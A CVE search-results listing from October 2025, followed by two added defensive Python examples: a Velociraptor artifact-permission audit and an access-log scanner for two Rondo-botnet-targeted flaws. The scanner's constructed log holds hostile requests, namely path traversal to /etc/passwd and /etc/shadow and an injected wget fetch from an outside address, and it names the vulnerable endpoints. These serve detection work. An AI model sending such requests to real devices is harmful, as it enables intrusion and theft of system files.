Search Results (314349 CVEs found)
CVE | Vendors | Products | Updated | CVSS v3.1 | Description
---|---|---|---|---|---
CVE-2025-55315 | | | 2025-10-15 | 9.9 Critical | Inconsistent interpretation of HTTP requests ('HTTP request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.
CVE-2025-53717 | | | 2025-10-15 | 7.0 High | Reliance on untrusted inputs in a security decision in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.
CVE-2025-55247 | | | 2025-10-15 | 7.3 High | Improper link resolution before file access ('link following') in .NET allows an authorized attacker to elevate privileges locally.
CVE-2025-8093 | | | 2025-10-15 | N/A | Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Authenticator Login allows Authentication Bypass. This issue affects Authenticator Login: from 0.0.0 before 2.1.8.
CVE-2025-54253 | Adobe | Experience Manager, Experience Manager Forms | 2025-10-15 | 10.0 Critical | Adobe Experience Manager versions 6.5.23 and earlier are affected by a Misconfiguration vulnerability that could result in arbitrary code execution. An attacker could leverage this vulnerability to bypass security mechanisms and execute code. Exploitation of this issue does not require user interaction and scope is changed.
CVE-2025-6264 | Rapid7 | Velociraptor | 2025-10-15 | 5.5 Medium | Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions. To limit access to some dangerous artifacts, Velociraptor allows them to require high permissions like EXECVE to launch. Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with the COLLECT_CLIENT permission (normally given by the "Investigator" role) to collect it from endpoints and update the configuration. This can lead to arbitrary command execution and endpoint takeover. To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have COLLECT_CLIENT, typically given by the "Investigator" role).
CVE-2025-62448 | | | 2025-10-15 | N/A | Not used
CVE-2025-62447 | | | 2025-10-15 | N/A | Not used
CVE-2025-62446 | | | 2025-10-15 | N/A | Not used
CVE-2025-62445 | | | 2025-10-15 | N/A | Not used
CVE-2025-62444 | | | 2025-10-15 | N/A | Not used
CVE-2025-62443 | | | 2025-10-15 | N/A | Not used
CVE-2025-62442 | | | 2025-10-15 | N/A | Not used
CVE-2025-62441 | | | 2025-10-15 | N/A | Not used
CVE-2025-62440 | | | 2025-10-15 | N/A | Not used
CVE-2025-11746 | | | 2025-10-15 | 8.8 High | The XStore theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 9.5.4 via the et_ajax_required_plugins_popup() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.
CVE-2025-54278 | | | 2025-10-15 | 5.5 Medium | Bridge versions 14.1.8, 15.1.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
CVE-2025-54268 | | | 2025-10-15 | 7.8 High | Bridge versions 14.1.8, 15.1.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
CVE-2024-13991 | | | 2025-10-15 | N/A | Huijietong Cloud Video Platform contains a path traversal vulnerability: an unauthenticated attacker can supply arbitrary file paths to the `fullPath` parameter of the `/fileDownload?action=downloadBackupFile` endpoint and retrieve files from the server filesystem. VulnCheck has observed this vulnerability being targeted by the Rondo botnet.
CVE-2023-7311 | | | 2025-10-15 | N/A | BYTEVALUE Intelligent Flow Control Router contains a command injection vulnerability via the `/goform/webRead/open` endpoint. The `path` parameter is not properly validated and is echoed into a shell context, allowing an attacker to inject and execute arbitrary shell commands on the device. Successful exploitation can lead to writing backdoors, privilege escalation on the host, and full compromise of the router and its management functions. VulnCheck has observed this vulnerability being targeted by the Rondo botnet.
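The Velociraptor entry (CVE-2025-6264) describes the control that was missing: artifacts that can do dangerous things are supposed to declare a required permission, such as EXECVE, on top of the COLLECT_CLIENT permission needed to collect any artifact. As an added example, not Rapid7's code and not its real artifact definitions, here is a Python audit that takes artifact definitions in the dict shape `yaml.safe_load` produces for an artifact YAML file and flags artifacts that call `execve()` without requiring EXECVE, or that are `Admin.Client.*` artifacts with no `required_permissions` at all. The artifact definitions below are constructed; the field names `name`, `sources`, `query` and `required_permissions` follow the Velociraptor artifact format, and the `Admin.Client.*` naming heuristic is this example's own assumption.

```python
"""Audit Velociraptor artifact definitions for the gap behind CVE-2025-6264:
VQL that can run commands or reconfigure the client while being collectable
with COLLECT_CLIENT alone.

Added example, not Rapid7 code. Artifacts are given in the dict shape that
yaml.safe_load returns for an artifact YAML file; the definitions below are
constructed, and the Admin.Client.* naming heuristic is this example's own.
"""
import re

# Constructed artifact definitions (not the real Admin.Client.UpdateClientConfig).
SAMPLE_ARTIFACTS = [
    {   # runs a program on the endpoint but is not gated: should be flagged
        "name": "Custom.Windows.RunTool",
        "sources": [{"query": "SELECT * FROM execve(argv=['whoami'])"}],
    },
    {   # client-admin artifact with no extra permission: should be flagged
        "name": "Admin.Client.ExampleConfigPush",
        "sources": [{"query": "SELECT * FROM info()"}],
    },
    {   # correctly gated: collecting it also needs EXECVE
        "name": "Admin.Client.ExampleUpgrade",
        "required_permissions": ["EXECVE"],
        "sources": [{"query": "SELECT * FROM execve(argv=['installer.exe'])"}],
    },
    {   # ordinary read-only collection: nothing to flag
        "name": "Generic.Client.Info",
        "sources": [{"query": "SELECT * FROM info()"}],
    },
]

# VQL call that spawns a process; treated here as requiring EXECVE.
EXECVE_CALL = re.compile(r"\bexecve\s*\(", re.IGNORECASE)


def vql_of(artifact):
    """Join the VQL of every source so a multi-source artifact is checked whole."""
    return "\n".join(src.get("query", "") for src in artifact.get("sources", []))


def audit_artifact(artifact):
    """Return a list of findings (empty when the artifact looks properly gated)."""
    findings = []
    perms = set(artifact.get("required_permissions") or [])
    vql = vql_of(artifact)
    if EXECVE_CALL.search(vql) and "EXECVE" not in perms:
        findings.append("calls execve() but does not require EXECVE")
    if artifact.get("name", "").startswith("Admin.Client.") and not perms:
        findings.append("Admin.Client artifact collectable with COLLECT_CLIENT alone "
                        "(no required_permissions)")
    return findings


def audit_artifacts(artifacts):
    """Map artifact name -> findings, only for artifacts with at least one finding."""
    report = {}
    for artifact in artifacts:
        findings = audit_artifact(artifact)
        if findings:
            report[artifact.get("name", "<unnamed>")] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_artifacts(SAMPLE_ARTIFACTS).items():
        for finding in findings:
            print(f"{name}: {finding}")
```

To run it over a real deployment, export the artifact definitions, load each file with `yaml.safe_load`, and pass the resulting dicts to `audit_artifacts`. The check is deliberately conservative: an `Admin.Client.*` artifact passes as soon as it declares any required permission, so a review of which permission it declares is still a manual step.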
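The last two entries (CVE-2024-13991 and CVE-2023-7311) name the endpoint and the parameter each Rondo botnet campaign abuses, which is enough to write a log-side check. The following is an added example, not code from VulnCheck or from either vendor: a small Python scanner that flags access-log lines hitting `/fileDownload?action=downloadBackupFile` with a `fullPath` that leaves the backup directory, and `/goform/webRead/open` with a `path` containing shell metacharacters. The log lines are constructed, the log format is assumed to be common log format, and the traversal and metacharacter patterns are heuristics, not the vendors' own validation rules.

```python
"""Flag access-log requests matching the two Rondo-targeted CVEs above.

Added example: the log lines are constructed (common log format assumed),
and the patterns are heuristics, not the vendors' own validation rules.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines: three abusive requests and two benign ones.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Oct/2025:10:01:02 +0000] "GET /fileDownload?action=downloadBackupFile&fullPath=../../../../etc/passwd HTTP/1.1" 200 1824
203.0.113.7 - - [15/Oct/2025:10:01:05 +0000] "GET /fileDownload?action=downloadBackupFile&fullPath=%2Fetc%2Fshadow HTTP/1.1" 200 912
198.51.100.9 - - [15/Oct/2025:10:02:11 +0000] "GET /goform/webRead/open?path=%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx HTTP/1.1" 200 34
192.0.2.4 - - [15/Oct/2025:10:03:00 +0000] "GET /fileDownload?action=downloadBackupFile&fullPath=backup-2025-10-14.zip HTTP/1.1" 200 40960
192.0.2.4 - - [15/Oct/2025:10:03:30 +0000] "GET /goform/webRead/open?path=config.txt HTTP/1.1" 200 512
"""

# Common log format: client, identity, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A ".." path segment, or an absolute POSIX/Windows path: either one leaves
# whatever backup directory the download handler was meant to serve from.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)|^[\\/]|^[A-Za-z]:[\\/]')
# Characters that terminate, chain or redirect a command once the value
# reaches a shell.
SHELL_META_RE = re.compile(r'[;&|`$\n\r<>]')


def classify_request(target):
    """Return (cve_id, reason) for a request target that matches one of the
    two abuse patterns, or None for anything else."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if parts.path == "/fileDownload" and "downloadBackupFile" in query.get("action", []):
        for raw in query.get("fullPath", []):
            value = unquote(raw)  # parse_qs decoded once; decode again for double-encoding
            if TRAVERSAL_RE.search(value):
                return ("CVE-2024-13991", f"fullPath leaves the backup directory: {value!r}")
    if parts.path == "/goform/webRead/open":
        for raw in query.get("path", []):
            value = unquote(raw)
            if SHELL_META_RE.search(value):
                return ("CVE-2023-7311", f"shell metacharacter in path: {value!r}")
    return None


def scan_log(log_text):
    """Parse each line and collect hits with enough context to triage."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not common log format; skip rather than guess
        verdict = classify_request(m["target"])
        if verdict is not None:
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "cve": verdict[0],
                "reason": verdict[1],
                "status": int(m["status"]),  # 200 means the server actually served it
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["cve"]} HTTP {hit["status"]}: {hit["reason"]}')
```

The scanner decodes each parameter value a second time after `parse_qs` so a double-encoded `%252e%252e` is still caught, and it keeps the response status in every hit: a flagged request that returned 200 is the one to triage first, since for the traversal case that means the file left the server. Response sizes are not examined, and the patterns will also fire on legitimate but unusual values, so treat a hit as a lead rather than a confirmed compromise.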